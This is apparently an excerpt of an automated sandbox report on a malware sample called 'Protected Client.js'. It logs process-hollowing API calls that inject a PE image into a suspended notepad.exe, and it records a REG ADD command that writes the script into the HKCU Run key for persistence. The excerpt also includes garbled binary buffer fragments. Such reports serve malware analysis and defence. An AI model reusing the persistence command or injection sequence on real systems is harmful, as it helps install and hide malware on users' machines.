NtResumeThread Sept. 9, 2021, 8 p.m.	thread_handle: 0x00000580 suspend_count: 1 process_identifier: 2860	1	0
NtResumeThread Sept. 9, 2021, 8:01 p.m.	thread_handle: 0x000001f4 suspend_count: 1 process_identifier: 2860	1	0
NtResumeThread Sept. 9, 2021, 8:01 p.m.	thread_handle: 0x0000049c suspend_count: 1 process_identifier: 2860	1	0
CreateProcessInternalW Sept. 9, 2021, 8:01 p.m.	thread_identifier: 2540 thread_handle: 0x00000550 process_identifier: 2564 current_directory: filepath: C:\Windows\SysWOW64\notepad.exe track: 1 command_line: filepath_r: C:\WINDOWS\syswow64\notepad.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000004a4	1	1
NtGetContextThread Sept. 9, 2021, 8:01 p.m.	thread_handle: 0x00000550	1	0
NtAllocateVirtualMemory Sept. 9, 2021, 8:01 p.m.	process_identifier: 2564 region_size: 495616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004a4	1	0
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,cç¨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,cç¿cûâ,cîâ-cñã,cy¼%b±â,c\|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaà l÷0@ÜTKP80l8Älhl@0t.text¶ `.rdatao0p@@.data\= @À.tls à@À.gfids0ð@@.rsrcTKL¢@@.reloc8P:î@B base_address: 0x00400000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: base_address: 0x00401000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: base_address: 0x00453000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ ´tE¸wE²tE..¡FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶F¡FP¶FP¶FP¶FP¶FP¶FP¶FP¶F¡Fÿÿÿÿ¸wE¨¢F¨¢F¨¢F¨¢F¨¢F¡F8zE¸{EEè¡F§FCPSTPDT°¢Fð¢Fÿÿÿÿÿÿÿÿÿÿÿÿ ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ§Fþÿÿÿþÿÿÿu0Ï!tåa¾e¸Â¢z»^ âÈ¨346E.?AVtype_info@@46E.?AVbad_alloc@std@@46E.?AVbad_array_new_length@std@@46E.?AVlogic_error@std@@46E.?AVlength_error@std@@46E.?AVout_of_range@std@@46E.?AV_Facet_base@std@@46E.?AV_Locimp@locale@std@@46E.?AVfacet@locale@std@@46E.?AU_Crt_new_delete@std@@46E.?AVcodecvt_base@std@@46E.?AUctype_base@std@@46E.?AV?$ctype@D@std@@46E.?AV?$codecvt@DDU_Mbstatet@@@std@@46E.?AVbad_exception@std@@46E.H46E.?AVfailure@ios_base@std@@46E.?AVruntime_error@std@@46E.?AVsystem_error@std@@46E.?AVbad_cast@std@@46E.?AV_System_error@std@@46E.?AVexception@std@@ base_address: 0x0046a000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: base_address: 0x0046e000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: +ÔÔ?¤Ø¾Ø?Ù?)s?ÚuZ55g;Ù.~~Dñìð??m(À'ÆØØ®õÐûõÛÝÛÝÛ(jk¡iæÞ\F£ã¥w¡Ô(´öä¼éÙ b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` ¢§µ¶³´±²¯°¸ Y base_address: 0x0046f000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: base_address: 0x00470000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: base_address: 0x00475000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2564 process_handle: 0x000004a4	1	1
NtSetContextThread Sept. 9, 2021, 8:01 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4388716 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000550 process_identifier: 2564	1	0
NtResumeThread Sept. 9, 2021, 8:01 p.m.	thread_handle: 0x00000550 suspend_count: 1 process_identifier: 2564	1	0
CreateProcessInternalW Sept. 9, 2021, 8 p.m.	thread_identifier: 816 thread_handle: 0x00000084 process_identifier: 1788 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\reg.exe track: 1 command_line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js" filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Protected Client.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All